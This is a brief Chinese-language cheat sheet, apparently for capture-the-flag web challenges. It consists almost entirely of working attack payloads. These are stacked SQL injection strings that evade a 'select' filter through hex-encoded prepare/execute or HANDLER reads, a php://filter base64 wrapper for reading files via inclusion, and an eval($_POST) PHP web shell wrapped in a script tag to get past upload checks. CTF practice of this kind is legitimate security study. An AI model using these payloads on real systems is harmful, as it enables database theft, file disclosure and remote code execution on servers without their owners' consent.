1.堆叠注入能够到列,再要出详细的数据需要构造select语句,如果select被正则匹配拦下,考虑使用
';set@a=16进制编码的查询语句(例如:select * from 表名);prepare execsql from @a;execute execsql;--+
或者
';handler 表名 open as a;handler a read next;--+
2.文件包含中的文件隐藏的flag,使用伪协议做包含
php://filter/convert.base64-encode/resource=文件名
3.文件上传对于<?的检测
可以使用<script language="php">eval($_POST['a'])</script>绕过